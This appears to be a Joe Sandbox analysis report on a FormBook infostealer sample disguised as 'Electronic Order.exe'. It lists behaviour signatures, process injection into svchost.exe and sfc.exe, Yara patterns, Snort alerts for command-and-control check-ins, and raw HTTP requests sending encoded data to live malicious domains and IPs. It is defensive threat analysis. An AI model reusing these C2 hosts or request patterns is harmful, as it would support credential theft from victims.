Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Electronic Order.exe

Overview

General Information

Sample name:Electronic Order.exe
Analysis ID:1471496
MD5:f44d956aa3a0c41f8e8ca7d9e9ead69c
SHA1:5d4cd96731237a1d8a8e03aa078b0bda9d2296a3
SHA256:48bae1515ac732f33a6fbd725dfb29fe55132b1f446f0efa201c1ad10cf0b1f6
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Electronic Order.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\Electronic Order.exe" MD5: F44D956AA3A0C41F8E8CA7D9E9EAD69C)
    • svchost.exe (PID: 964 cmdline: "C:\Users\user\Desktop\Electronic Order.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • BSPmWtBGjJwku.exe (PID: 1008 cmdline: "C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sfc.exe (PID: 64 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)
          • BSPmWtBGjJwku.exe (PID: 6784 cmdline: "C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b6b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b6b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dca3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x167f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2eaa3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x175f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Electronic Order.exe", CommandLine: "C:\Users\user\Desktop\Electronic Order.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Electronic Order.exe", ParentImage: C:\Users\user\Desktop\Electronic Order.exe, ParentProcessId: 7144, ParentProcessName: Electronic Order.exe, ProcessCommandLine: "C:\Users\user\Desktop\Electronic Order.exe", ProcessId: 964, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Electronic Order.exe", CommandLine: "C:\Users\user\Desktop\Electronic Order.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Electronic Order.exe", ParentImage: C:\Users\user\Desktop\Electronic Order.exe, ParentProcessId: 7144, ParentProcessName: Electronic Order.exe, ProcessCommandLine: "C:\Users\user\Desktop\Electronic Order.exe", ProcessId: 964, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:07/11/24-15:07:47.687248
            SID:2855464
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:19.325666
            SID:2855464
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:09.188758
            SID:2855465
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:46.273374
            SID:2855464
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:03.503858
            SID:2855464
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:35.210818
            SID:2855464
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:07:22.659611
            SID:2855465
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:07:33.501313
            SID:2855464
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:07:02.361687
            SID:2855464
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:48.845266
            SID:2855464
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:32.631655
            SID:2855464
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:40.341512
            SID:2855465
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:07:17.488664
            SID:2855464
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:00.490458
            SID:2855464
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:07:38.871550
            SID:2855465
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:05:38.936362
            SID:2855465
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:07:30.927773
            SID:2855464
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:59.761285
            SID:2855464
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:24.480321
            SID:2855465
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:07:14.913315
            SID:2855464
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:16.735802
            SID:2855464
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:07:45.121444
            SID:2855464
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:06:53.999548
            SID:2855465
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:07:52.855523
            SID:2855465
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/11/24-15:07:07.976080
            SID:2855465
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK87Qltir3slpfPozUvsqGQgAfOSyHKAppI3MtD1Vl5l86WUTbGvYQ=&GX=iP9xCLAvira URL Cloud: Label: malware
            Source: http://www.xn72dkd7scx.shop/emnz/Avira URL Cloud: Label: malware
            Source: https://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCsAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Electronic Order.exeReversingLabs: Detection: 50%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Electronic Order.exeJoe Sandbox ML: detected
            Source: Electronic Order.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BSPmWtBGjJwku.exe, 00000005.00000000.2308549836.000000000087E000.00000002.00000001.01000000.00000005.sdmp, BSPmWtBGjJwku.exe, 00000009.00000000.2557513223.000000000087E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Electronic Order.exe, 00000000.00000003.2120952342.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, Electronic Order.exe, 00000000.00000003.2118802233.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2389297645.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2195945105.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2389297645.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203602053.0000000003300000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2399169614.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2389630955.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.0000000003150000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Electronic Order.exe, 00000000.00000003.2120952342.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, Electronic Order.exe, 00000000.00000003.2118802233.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2389297645.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2195945105.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2389297645.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203602053.0000000003300000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, sfc.exe, 00000007.00000003.2399169614.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2389630955.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.0000000003150000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sfc.pdb source: svchost.exe, 00000002.00000003.2357574696.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357425251.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000002.3958315142.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: svchost.exe, 00000002.00000003.2357574696.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357425251.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000002.3958315142.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E24696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E24696
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E2C9C7
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2C93C FindFirstFileW,FindClose,0_2_00E2C93C
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E2F200
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E2F35D
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E2F65E
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E23A2B
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E23D4E
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E2BF27
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0074C1A0 FindFirstFileW,FindNextFileW,FindClose,7_2_0074C1A0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 4x nop then xor eax, eax7_2_00739C20
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 4x nop then pop edi7_2_007423C3
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 4x nop then mov ebx, 00000004h7_2_02FA04DF

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49718 -> 142.250.186.115:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49721 -> 103.42.108.46:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49722 -> 103.42.108.46:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49725 -> 103.42.108.46:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49727 -> 188.114.97.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49728 -> 188.114.97.3:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49730 -> 188.114.97.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49732 -> 134.122.138.60:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49733 -> 134.122.138.60:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49735 -> 134.122.138.60:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49736 -> 35.212.86.52:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49737 -> 35.212.86.52:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49739 -> 35.212.86.52:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49740 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49741 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49743 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49745 -> 188.114.97.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49746 -> 188.114.97.3:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49748 -> 188.114.97.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49749 -> 154.222.238.52:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49750 -> 154.222.238.52:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49752 -> 154.222.238.52:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49753 -> 162.254.38.56:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49754 -> 162.254.38.56:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49756 -> 162.254.38.56:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.u9games.xyz
            Source: DNS query: www.globaltrend.xyz
            Source: DNS query: www.ffi07s.xyz
            Source: DNS query: www.j51a.xyz
            Source: DNS query: www.j51a.xyz
            Source: DNS query: www.j51a.xyz
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: VPSQUANUS VPSQUANUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00E325E2
            Source: global trafficHTTP traffic detected: GET /5p8u/?bB=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE4pdkHQNYCcMydqGB2gqLe2sbuiq25D1rJ1mxG6bIX3u8VlvncNw=&GX=iP9xCL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.u9games.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /la5g/?bB=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgux8tOuN0aZLZltNFIk/K42/BpKJFGlwhqT0DSxlttxHpFsGsCOs=&GX=iP9xCL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dtalusering.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /mnr7/?GX=iP9xCL&bB=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxuPSiXshxZ6wDjjo+Bu7fQW2AB1/UcYCTUQt5fsneQZKM7Qry97A= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.alphacentura.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK87Qltir3slpfPozUvsqGQgAfOSyHKAppI3MtD1Vl5l86WUTbGvYQ=&GX=iP9xCL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.xn72dkd7scx.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /s992/?bB=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/pp3mulo7axc+TzXdoadqFnX1TrnWwrCFMVfzI6hQm88OLivvE0I=&GX=iP9xCL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dynamologistics.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
